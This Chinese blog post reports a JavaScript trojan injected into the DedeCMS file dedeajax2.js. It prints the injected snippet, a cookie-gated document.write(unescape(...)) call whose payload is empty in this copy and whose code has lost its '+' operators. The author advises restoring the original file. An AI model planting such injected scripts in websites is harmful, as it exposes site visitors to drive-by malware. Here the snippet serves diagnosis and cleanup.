dedecms:dedeajax2.js被植入js木马

所属分类: CMS教程 / dedecms 阅读数: 1557
收藏 0 赞 0 分享
这阵子我的一个网站被植入了木马,程序dede。于是我升级到了IE7+全补丁,为了查木马做准备工作,呵呵。结果发现,dedeajax2.js被植入了木马。源码如下:

//初始化xmldom
function InitXDom(){
if(DedeXDOM!=null) return;
var obj = null;
if (typeof(DOMParser) != "undefined") { // Gecko、Mozilla、Firefox
var parser = new DOMParser();
obj = parser.parseFromString(xmlText, "text/xml");
} else { // IE
try { obj = new ActiveXObject("MSXML2.DOMDocument");} catch (e) { }
if (obj == null) try { obj = new ActiveXObject("Microsoft.XMLDOM"); } catch (e) { }
}
DedeXDOM = obj;
};
//以下是被植入木马的部分,乱码都是经由unicode码处理。现在的马夫越来越狡猾了
if(document.cookie.indexOf('hello')==-1){var expires=new Date();expires.setTime(expires.getTime() 24*60*60*1000);document.cookie='hello=Yes;path=/;expires=' expires.toGMTString();document.write(unescape(""));}

用原版本的dedeajax2覆盖,即可。这个文件,dede的模板都要用到,搜索了,没有发现说明用处。

不过建议大家,多注意dedecms的官方补丁,unix服务器的站长,千万别所有文件都是设置,虽然dede在unix的服务器上,设置太过繁琐。

关键字描述:木马 obj " if new // null var dede 植入
更多精彩内容其他人还在看

使用Dedecms中七个容易忽略的安全细节介绍

dede也许站长都会用了.但是有不少的细节和经验还是要注意的
收藏 0 赞 0 分享

让Dedecms自带搜索实现全文检索(支持标题与内容)

Dedecms 5.5 5.6默认的模糊搜索只能根据网站文章的名称进行搜索,无法搜索到文章内部信息,下面讲一下如何让Dedecms自带搜索实现全文检索
收藏 0 赞 0 分享

织梦DedeCms v5.6/5.7 新图集页面增加图片下载功能

织梦DedeCms v5.6/5.7 新图集页面增加图片下载功能,其实就是加个右键下载提示功能
收藏 0 赞 0 分享

dedecms5.7sp1评论添加字段的实现方法

有时候我们需要对评论添加字段,让用户更喜欢留言,有类似需要的朋友可以参考下
收藏 0 赞 0 分享

织梦CMS采集时keywords字段无法添加过滤规则的解决方法

有朋友反馈,采集规则编写时,需要对keywords进行剔除,使用 {dede:trim replace=''}(.*){/dede:trim} 过滤规则无效。查看了下,附上解决办法
收藏 0 赞 0 分享

dedecms实现大图showphoto.htm输出图集内容简介方法

dedecms实现大图showphoto.htm输出图集内容简介方法,需要的朋友可以参考下
收藏 0 赞 0 分享

为DedeCMS换上精美多样的提示信息窗口

为DedeCMS换上精美多样的提示信息窗口 用到的开源项目:DedeCMS ,artdialog 步骤
收藏 0 赞 0 分享

DedeCMS Pagetitle 标记使用实例教程

DedeCMS Pagetitle 标记使用实例教程 【Pagetitle 标记】 功能说明:表示获取文档的分页标题 适用范围:仅文档模板
收藏 0 赞 0 分享

织梦DedeCMS实现 三级栏目_二级栏目_一级栏目_网站名称 的效果代码

用这个办法,可以实现
收藏 0 赞 0 分享

dedecms获取文档当前栏目所在目录链接URL

dedecms内容页调用当前栏目其实用下来是调用不出来的,{dede:field.typename/}是有效的,可是 {dede:field.typeurl/}却调不出文档当前栏目所在目录链接URL
收藏 0 赞 0 分享
查看更多